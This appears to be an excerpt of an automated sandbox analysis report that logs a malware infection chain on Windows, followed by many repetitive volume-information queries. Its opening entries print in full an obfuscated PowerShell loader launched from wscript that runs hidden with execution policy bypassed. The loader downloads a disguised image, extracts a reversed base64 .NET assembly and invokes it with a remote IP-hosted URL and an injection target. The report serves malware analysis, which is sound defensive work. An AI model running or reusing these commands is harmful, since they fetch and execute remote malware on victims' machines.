                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'awvyicggkcgnm1peaw1hz2vvcmwgpsbjdwfodhrwczovlzewmtcuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxla2v5ptjbyv9iv285umv1ndv0n0jvmwtwz3nkoxbuoxbnu1nsdln0r3juveldzkzobvqnkydljysnajnmqzztuxrjy09jx1qznxcmcgtfdmlkpwzkngy2mtqnkydiyjiwjysnowm2mmmxnzmwjysnotq1mtc2yta5mccrjzrmiel1jysnytszwkr3zwjdbccrj2llbnqgpsbozxctt2jqzwn0ifn5cycrj3rlbs5ojysnzxquv2viq2xpzw50oznargltywdlqnl0zxmgpsazwkr3zwjdbgllbnqurg93bmxvywreyxrhkdnargltywdlvxjsktszwkrpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkcnkydldfn0cmluzycrjygzwkrpbwfnzuj5dgvzktszwkrzdgfydezsjysnywcgpsbjdwe8pejbu0u2nf9tvefsvd4+sxvhoznargvuzezsywcgpsbjdwe8pejbu0u2nf9ftkq+pkl1jysnytszwkrzdgfydeluzgv4id0gm1peaw1hz2unkyduzxh0lkluzgv4t2yom1pec3rhcnrgbgfnktszwkrlbmrjbmrleca9idnargltywdlvgv4dc5jbmrlee9mkdnargvuzezsjysnywcpoznarhn0yxj0sw5kzxgglwdlidaglwfuzcazwkrlbmrjbmrlecatz3qgm1pec3rhcnrjbmrledszwkrzdgfydeluzgv4ics9idnarhn0yxj0rmxhzy5mzw5ndgg7m1peymfzzty0tgvuz3roid0gm1onkydezw5ksw5kzxgglsazwkrzdgfydeluzgv4jysnoznajysnrgjhc2u2jysnnenvbw1hbmqgpsazwkrpbwfnzvrlehquu3vic3ryaw5nkdnarhn0yxj0sw5kzxgsidnarginkydhc2u2nexlbmcnkyd0ack7m1peymfzzty0umv2zxjzzwqgpsatam9pbiaom1peymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpihp3dibgb3jfywnolu9iamvjdcb7idnarf8gjysnfslblscrjzeuli0om1peymfzzty0q29tbwfuzc5mzw5ndccrj2gpxtszwkrjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkdnargjhc2u2nfjldmvyc2unkydkktszwkrsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgunkydjdglvbi5bc3nlbwjsev06okxvywqom1pey29tbwfuzej5dgunkydzktszwkr2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzscrj10ur2v0twv0ag9kkel1yvzbsul1ysk7jysnm1pedmfptwv0ag9klkludm9rzsgzwkrudwxslcbakel1yxr4dc5ltedptc8zmy82mzeumzqyljmumjkxly86cccrj3r0ael1yscrjywgsxvhzccrj2vzyxrpdmfkb0l1yswgsxvhzgvzyxrpdmfkb0l1yswgsxvhzgvzyxrpdicrj2fkb0l1yswgsxvhyxnwbmv0x2nvbxbpbgvysxvhlcbjdwfkzxnhdgknkyd2ywrvsxvhlcbjdwfkzxnhdgl2ywrvsxvhlel1jysnywrlc2f0axzhzg9jdwessxvhzgvzyxrpdmfkb0l1ysxjdwfkzxnhdgl2ywrvsxunkydhlel1ywrlc2f0axzhzg9jdscrj2essxvhzgvzyxrpdmfkb0l1ysxjjysndwexsxvhlel1ywrlc2f0axzhzg9jdwepjysnktsnksaglunszxbsywnlkftdaefyxtczk1tdaefyxtexnytbq2hbcl05nyksw0noqxjdmzkglunszxbsywnlkftdaefyxtuxk1tdaefyxtkwk1tdaefyxty4ksxbq2hbcl0zni1dumvwbgfjzsagkftdaefyxteymitbq2hbcl0xmtkrw0noqxjdmte4ksxbq2hbcl0xmjqpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('3zdimageurl = iuahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt'+'k'+'j3lc6sqticoc_t35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f iu'+'a;3zdwebcl'+'ient = new-object sys'+'tem.n'+'et.webclient;3zdimagebytes = 3zdwebclient.downloaddata(3zdimageurl);3zdimagetext = [system.text.encoding]::utf8.g'+'etstring'+'(3zdimagebytes);3zdstartfl'+'ag = iua<<base64_start>>iua;3zdendflag = iua<<base64_end>>iu'+'a;3zdstartindex = 3zdimage'+'text.indexof(3zdstartflag);3zdendindex = 3zdimagetext.indexof(3zdendfl'+'ag);3zdstartindex -ge 0 -and 3zdendindex -gt 3zdstartindex;3zdstartindex += 3zdstartflag.length;3zdbase64length = 3z'+'dendindex - 3zdstartindex'+';3z'+'dbase6'+'4command = 3zdimagetext.substring(3zdstartindex, 3zdb'+'ase64leng'+'th);3zdbase64reversed = -join (3zdbase64command.tochararray() zwv foreach-object { 3zd_ '+'})[-'+'1..-(3zdbase64command.lengt'+'h)];3zdcommandbytes = [system.convert]::frombase64string(3zdbase64reverse'+'d);3zdloadedassembly = [system.refle'+'ction.assembly]::load(3zdcommandbyte'+'s);3zdvaimethod = [dnlib.io.home'+'].getmethod(iuavaiiua);'+'3zdvaimethod.invoke(3zdnull, @(iuatxt.klgol/33/631.342.3.291//:p'+'tthiua'+', iuad'+'esativadoiua, iuadesativadoiua, iuadesativ'+'adoiua, iuaaspnet_compileriua, iuadesati'+'vadoiua, iuadesativadoiua,iu'+'adesativadoiua,iuadesativadoiua,iuadesativadoiu'+'a,iuadesativadoiu'+'a,iuadesativadoiua,i'+'ua1iua,iuadesativadoiua)'+');') -creplace([char]73+[char]117+[char]97),[char]39 -creplace([char]51+[char]90+[char]68),[char]36-creplace ([char]122+[char]119+[char]118),[char]124))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
